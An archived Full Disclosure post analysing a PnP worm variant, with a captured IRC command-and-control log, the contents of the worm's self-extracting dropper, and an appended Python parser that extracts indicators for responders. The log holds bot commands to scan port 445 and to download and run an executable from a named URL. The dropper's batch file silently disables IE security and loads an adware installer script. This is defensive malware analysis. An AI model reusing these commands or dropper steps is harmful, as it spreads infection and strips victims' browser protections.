Full Disclosure mailing list archives
pnp worm unknown variant - post infection actions
From: "Morning Wood" <se_cur_ity () hotmail com>
Date: Tue, 16 Aug 2005 16:03:32 -0700
pnp worm unknown variant - post infection actions
Donnie Werner
http://exploitlabs.com

[ relevant info ]

[08/16/2005] (out) NICK [00|USA|618452]
[08/16/2005] (out) USER 2K-7566 * 0 :INFECTEDUSER
[08/16/2005] (in) :hub.de NOTICE [00|USA|618452] :*** If you are having problems connecting due to ping timeouts, please type /quote pong 5DCA1942 or /raw pong 5DCA1942 now.
[08/16/2005] (in) PING :5DCA1942
[08/16/2005] (out) PONG 5DCA1942
[08/16/2005] (in) :hub.de 001 [00|USA|618452] :Welcome to the hub IRC Network [00|USA|618452]!2K-7566 () 71 xx xx.49
[08/16/2005] (in) :hub.de 004 [00|USA|618452] hub.de Unreal3.2.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeKVfMGCuzNT
[08/16/2005] (out) MODE [00|USA|618452]
[08/16/2005] (out) JOIN #upnp
[08/16/2005] (in) :hub.de 332 [00|USA|618452] #upnp :.asc -S -s|.else status scan .asc PnP445 120 5 0 _a _r _e _s|.if nick *USA* .r JOIN #usa
[08/16/2005] (out) JOIN #usa
[08/16/2005] (out) PRIVMSG #upnp :IRC// Sent IRC raw: "JOIN #usa".
[08/16/2005] (in) :[00|USA|618452]!2K-7566 () 71 xx xx.49 JOIN :#usa
[08/16/2005] (in) :hub.de 332 [00|USA|618452] #usa :.down http://www.dreamcatcherprod.com/gc.exe C:\u487sdjkt.exe 1 -s|.r JOIN #rr
[08/16/2005] (out) JOIN #rr

[ gc.exe ]

gc.exe is a self-extracting archive that expands to..

02/08/2005 05:33 AM 3,496 kans.reg
01/31/2005 06:57 AM 3,276 kansup.reg
07/31/2005 11:06 PM 378 update.html
07/15/2005 05:36 AM 95 x.bat

the .bat runs..
----------
REGEDIT.EXE /S kans.reg
update.html
SLEEP 5
del kans.reg
del x.bat
----------

the .reg files disable IE Security settings

update.html contains...
----------
[TITLE]Security Update[/TITLE]
[HEAD][/HEAD]
[BODY]
[script language='JavaScript' type='text/JavaScript' src='http://install.xxxtoolbar.com/ist/scripts/prompt.php?retry=2&loadfirst=1&delayload=0&account_id=159900&recurrence=always&adid=a1117836900&event_type=onload&signature=159900'][/script]
[script language="JavaScript"]self.focus();[/script]
----------

which installs pornographic malware.
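As an added example (not part of the original post or Donnie Werner's analysis), the Python below parses a client-side IRC capture in the format quoted above and pulls out what a responder wants from it: the bot's nick, the channels it was steered through, the scan module named in a channel topic, and the download URL and drop path. The sample capture re-types the lines quoted above; the regex names and the report layout are my own.

```python
import re

# Sample capture: the IRC exchange quoted in the post, re-typed one
# message per line so it can be parsed offline (raw string keeps the C:\ path).
SAMPLE_LOG = r"""
[08/16/2005] (out) NICK [00|USA|618452]
[08/16/2005] (out) USER 2K-7566 * 0 :INFECTEDUSER
[08/16/2005] (in) PING :5DCA1942
[08/16/2005] (out) PONG 5DCA1942
[08/16/2005] (out) JOIN #upnp
[08/16/2005] (in) :hub.de 332 [00|USA|618452] #upnp :.asc -S -s|.else status scan .asc PnP445 120 5 0 _a _r _e _s|.if nick *USA* .r JOIN #usa
[08/16/2005] (out) JOIN #usa
[08/16/2005] (in) :hub.de 332 [00|USA|618452] #usa :.down http://www.dreamcatcherprod.com/gc.exe C:\u487sdjkt.exe 1 -s|.r JOIN #rr
[08/16/2005] (out) JOIN #rr
"""

LINE_RE = re.compile(r"^\[(?P<date>[^\]]+)\] \((?P<dir>in|out)\) (?P<msg>.*)$")
# RPL_TOPIC (332): ":<server> 332 <nick> <channel> :<topic>"; the topic is the command line.
TOPIC_RE = re.compile(r"^:\S+ 332 \S+ (?P<chan>#\S+) :(?P<topic>.*)$")
DOWN_RE = re.compile(r"\.down\s+(?P<url>\S+)\s+(?P<path>\S+)")   # .down <url> <local path> ...
SCAN_RE = re.compile(r"\.asc\s+(?!-)(?P<module>\S+)")              # .asc <module> ... (skip flag-only forms)
REDIR_RE = re.compile(r"\.r\s+JOIN\s+(?P<chan>#\S+)")              # .r JOIN <next channel>


def analyze(log_text):
    """Walk a client-side capture and summarise the bot's C&C behaviour."""
    report = {"bot_nick": None, "joined": [], "topics": {},
              "downloads": [], "scans": [], "redirects": []}
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue                       # not a capture line
        direction, msg = m["dir"], m["msg"]
        if direction == "out":             # what the infected host sent
            if msg.startswith("NICK "):
                report["bot_nick"] = msg[5:]
            elif msg.startswith("JOIN "):
                report["joined"].append(msg[5:])
            continue
        t = TOPIC_RE.match(msg)            # only server-sent topics carry commands
        if not t:
            continue
        topic = t["topic"]
        report["topics"][t["chan"]] = topic.split("|")   # commands are '|'-separated
        report["downloads"] += [(d["url"], d["path"]) for d in DOWN_RE.finditer(topic)]
        report["scans"] += [s["module"] for s in SCAN_RE.finditer(topic)]
        report["redirects"] += [r["chan"] for r in REDIR_RE.finditer(topic)]
    return report
```

The `downloads` and `redirects` lists are the indicators worth blocking or hunting for in proxy and IRC logs; the `topics` map preserves each channel's full command string for the report.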